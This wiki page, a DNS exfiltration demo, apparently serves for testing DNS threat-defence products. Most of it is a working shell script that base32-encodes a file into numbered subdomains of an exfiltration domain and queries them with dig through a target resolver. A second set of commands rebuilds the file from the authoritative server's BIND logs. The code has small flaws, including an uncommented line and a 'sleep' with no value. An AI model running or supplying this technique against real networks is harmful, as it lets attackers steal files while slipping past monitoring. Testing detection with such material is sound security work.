Saucepan

User Tools

Site Tools

Trace: high_availability best_practice globalprotect install_apex_without_glassfish migration cloud_network_automation forwarding logging enumerate_domain_data dns_exfiltration
dns:dns_exfiltration

This is an old revision of the document!

DNS Exfiltration Demo

Guide here

Simple Exfiltration

Note that the BIND logs will be approximately 17 times the size of the transferred file.

Note that this is actually two scripts as the last few commands are to be run on the DNS auth server to decrypt the logs. 

# File to be exfiltrated
SOURCE=/home/name/dns_exfil_test/file.pdf

# 
ENCRYPTED=/home/name/dns_exfil_test/encryptedpdf.txt
ENCRYPTED2=/home/name/dns_exfil_test/decryptedpdf.txt

# SLD of exfiltration domain
DOMAIN=ferrety-solutions.com

# sub-domain off SLD that we change for every file
SUBDOM=asdf

# Target DNS server (e.g. NIOS with DFP or BloxOne Host)
LOCALDNS=192.168.11.154

# Log file that the DNS queries can be found in on the authoratative DNS server
BIND_LOG_FILE=/var/log/named/query.log]

# File to put the decrypted, received file into (should be a replicat of SOURCE)
DECRYPTEDOUTPUT=/home/name/dns_exfil_test/file2.pdf


# Encrypt source file into Base32
# then split into strings of 32 characters each. 
# Then suffix on the domain to query.
# Then add the line number to the start of each line (i.e. put a sequence number on each query)
# Then replace the whitespace at the start of each line with nothing (i.e remove it)
# Then replace the TAB between the number and domain with a "."
base32 $SOURCE | tr -d '\n' | fold -32 | sed -e "s/$/.$SUBDOM.$DOMAIN/" | nl | sed s/^' '*//g | sed "s/\\t/./g" > $ENCRYPTED

# The result is a file that contains a hugh list of FQDN's for us to query (exfiltrate)

# Use DIG to iterate over the file and resolve the DNS at full speed.
dig +short A @$LOCALDNS -f $ENCRYPTED

# OR - if you want to add a delay into the exfiltration, use the following line.
# for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep ;done




## The following commands get run on the command auth DNS server.
# Parse DNS Server logs
# Then limit the scope just the queries associated with the SUBDOM that we set (i.e. ignore all the other random stuff we get/ignore any other exfiltration tasks running).
# Then extract just the FQDN query itself
# Then strip the ( character
# Then strip the ): character
# Put the output into ENCRYPTED2 (i.e the DNS server's copy of the encrypted file.
cat $BIND_LOG_FILE | grep $SUBDOM.$DOMAIN | awk -F " " '{print $8}' | sed s/\(//g | sed s/\)://g > $ENCRYPTED2

# Take the ENCRYPTED2 file
# Then stip off the DOMAIN bit of the data.
# Then sort the output as sometimes queries come in on the wrong order.
# remove duplicate queries (BloxOne Threat Defense seems to duplicate stuff a bit).
# Then strip out the new line character to so we just have a bunch of Base32 code.
# Then convert Base32 back to normal file.
Convert back from Base32 and recreate original file.
cat $ENCRYPTED2 | sed "s/.$SUBDOM.$DOMAIN//g" | sort | uniq | tr -d '\n' | base32 --decode > $DECRYPTEDOUTPUT
dns/dns_exfiltration.1686216598.txt.gz · Last modified: by bstafford